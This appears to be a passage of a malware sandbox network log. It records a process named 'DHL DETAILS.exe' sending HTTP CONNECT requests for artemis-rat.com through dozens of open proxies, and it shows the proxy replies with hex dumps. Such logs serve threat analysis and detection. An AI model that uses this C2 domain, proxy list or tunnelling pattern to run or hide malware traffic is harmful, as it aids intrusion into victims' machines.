Mar 9, 2024 13:14:15.339485884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.671163082 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.2 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
780	192.168.2.5	52361	49.4.48.128	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.339802980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
781	192.168.2.5	52492	93.190.142.57	26541	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.341701984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.636974096 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Mar 9, 2024 13:14:16.455274105 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
782	192.168.2.5	52552	104.145.235.200	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.343293905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.565403938 CET	247	IN	HTTP/1.0 307 Temporary Redirect Server: squid/3.1.23 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 0 Location: http://check.unblock-us.com/?url=artemis-rat.com%3A443 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
783	192.168.2.5	52455	43.155.142.116	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.343900919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
784	192.168.2.5	52362	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.353023052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
785	192.168.2.5	52465	198.44.255.3	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.358094931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.674864054 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
786	192.168.2.5	51583	8.217.143.187	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.360726118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
787	192.168.2.5	51578	202.61.204.51	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.362063885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536266088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630251884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
788	192.168.2.5	52490	20.206.106.192	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.369631052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.690192938 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
789	192.168.2.5	52382	103.49.202.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.371601105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.746675014 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
790	192.168.2.5	52629	104.17.84.150	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.374190092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.528342009 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
791	192.168.2.5	52560	72.210.221.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.379573107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
792	192.168.2.5	52578	52.35.240.119	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.387530088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.579227924 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
793	192.168.2.5	52825	202.159.35.153	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.388196945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
794	192.168.2.5	52539	177.234.244.174	32213	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.389158964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
795	192.168.2.5	52827	202.159.35.153	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.389442921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
796	192.168.2.5	52828	202.159.35.153	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.390724897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
797	192.168.2.5	52436	58.234.116.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.390749931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
798	192.168.2.5	52658	172.67.206.105	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.390947104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.545305967 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
799	192.168.2.5	52526	46.17.63.166	4444	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.394011974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.687347889 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
800	192.168.2.5	52830	202.159.35.153	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.395559072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
801	192.168.2.5	52683	31.43.179.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.453263998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.607429028 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
802	192.168.2.5	51614	66.84.6.21	62645	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.467226028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536427021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630259037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.629947901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
803	192.168.2.5	49909	189.240.60.171	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.472489119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536422014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.034794092 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
804	192.168.2.5	52573	211.222.252.187	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.476938009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
805	192.168.2.5	52537	177.12.118.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.477370024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
806	192.168.2.5	52580	170.245.57.228	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.477888107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
807	192.168.2.5	52464	89.218.8.152	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.479882002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
808	192.168.2.5	52642	129.213.150.205	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.482552052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
809	192.168.2.5	52667	104.129.205.94	54321	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.482861996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.686809063 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
810	192.168.2.5	49912	195.177.217.131	52858	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.483021021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.552359104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
811	192.168.2.5	52711	162.159.242.150	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
